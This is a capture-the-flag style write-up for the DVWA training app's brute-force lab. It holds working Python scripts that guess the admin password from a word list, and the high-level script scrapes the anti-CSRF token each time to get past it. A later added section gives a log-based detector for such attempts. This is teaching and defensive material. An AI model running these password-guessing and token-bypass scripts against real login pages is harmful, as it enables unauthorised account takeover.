
DVWA - Brute Force (low, medium, high)

2017-01-05 22:08

low

Iterate over a dictionary (this only succeeds if the password is in the dictionary).

import requests

def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
    # Session cookie of a logged-in DVWA user; the security level travels in the cookie
    headers = {
        'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=low'
    }
    # One candidate password per line
    with open('pwd.txt') as h:
        for line in h:
            password = line.strip()
            new_url = url + '?username=admin&password=' + password + '&Login=Login'
            res = requests.get(new_url, headers=headers)
            # res.text is a str; res.content is bytes on Python 3
            if 'Username and/or password incorrect.' in res.text:
                print('Test %s: No' % password)
            else:
                print('Test %s: Yes' % password)
                break

if __name__ == '__main__':
    main()


Result

Test 123456: No
Test admin: No
Test password: Yes
[Finished in 0.3s]


medium

Looking at the source code reveals

sleep( 2 );


A failed attempt is delayed by 2 s. The method is the same as for low, only slower; the security level in the cookie has to be updated.

headers = {
    'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=medium'
}


high

Looking at the source code reveals

<input type="hidden" name="user_token" value="2fe55c6b0091776e6f46283d41854b41">


// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


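There is one more field. Testing shows that the value of the user_token field is dynamic, so the approach is to fetch that field's value dynamically in code and then send the request that tests the password.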

import requests
import re

def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
    headers = {
        'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=high'
    }
    with open('pwd.txt') as h:
        for line in h:
            password = line.strip()
            # Fetch the form first to read the current user_token
            res = requests.get(url, headers=headers)
            # Accept either quote style around the attribute values
            m = re.search(r"user_token['\"] value=['\"](.*?)['\"]", res.text, re.M | re.S)
            if m:
                user_token = m.group(1)
                new_url = url + '?username=admin&password=' + password + '&user_token=' + user_token + '&Login=Login'
                res = requests.get(new_url, headers=headers)
                # res.text is a str; res.content is bytes on Python 3
                if 'Username and/or password incorrect.' in res.text:
                    print('Test %s: No' % password)
                else:
                    print('Test %s: Yes' % password)
                    break

if __name__ == '__main__':
    main()
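
Neither the 2 s delay nor the per-request token changes what the server sees: one client submitting many different passwords for the same username in a short time. The following added example (not part of the original post) flags that pattern in a web access log. The log lines, client addresses, threshold and time window are constructed values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

LOGIN_PATH = '/dvwa/vulnerabilities/brute/index.php'
# Constructed sample access-log lines; not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2017:22:00:01 +0800] "GET /dvwa/vulnerabilities/brute/index.php HTTP/1.1" 200 4300
10.0.0.5 - - [05/Jan/2017:22:00:01 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=123456&user_token=t1&Login=Login HTTP/1.1" 200 4350
10.0.0.5 - - [05/Jan/2017:22:00:03 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=admin&user_token=t2&Login=Login HTTP/1.1" 200 4350
10.0.0.5 - - [05/Jan/2017:22:00:05 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=password&user_token=t3&Login=Login HTTP/1.1" 200 4400
10.0.0.9 - - [05/Jan/2017:22:10:00 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=passw0rd&Login=Login HTTP/1.1" 200 4350
10.0.0.9 - - [05/Jan/2017:22:10:20 +0800] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=password&Login=Login HTTP/1.1" 200 4400
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" (\d{3})')

def parse(log_text):
    """Yield (ip, time, username, password) for each login attempt in the log."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target, _status = m.groups()
        parts = urlsplit(target)
        qs = parse_qs(parts.query)
        if parts.path != LOGIN_PATH or 'password' not in qs:
            continue  # plain form/token fetches are not login attempts
        when = datetime.strptime(ts, '%d/%b/%Y:%H:%M:%S %z')
        yield ip, when, qs.get('username', [''])[0], qs['password'][0]

def detect(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return sorted (ip, username) pairs with >= threshold distinct passwords inside one window."""
    attempts = defaultdict(list)
    for ip, when, user, pwd in parse(log_text):
        attempts[(ip, user)].append((when, pwd))
    flagged = set()
    for key, events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # Count distinct passwords tried within `window` of this attempt
            distinct = {p for t, p in events[i:] if t - start <= window}
            if len(distinct) >= threshold:
                flagged.add(key)
                break
    return sorted(flagged)

if __name__ == '__main__':
    print(detect(SAMPLE_LOG))
```

Because the form is submitted over GET, every guessed password, including the valid one, ends up in the access log, so those logs should be handled as sensitive data.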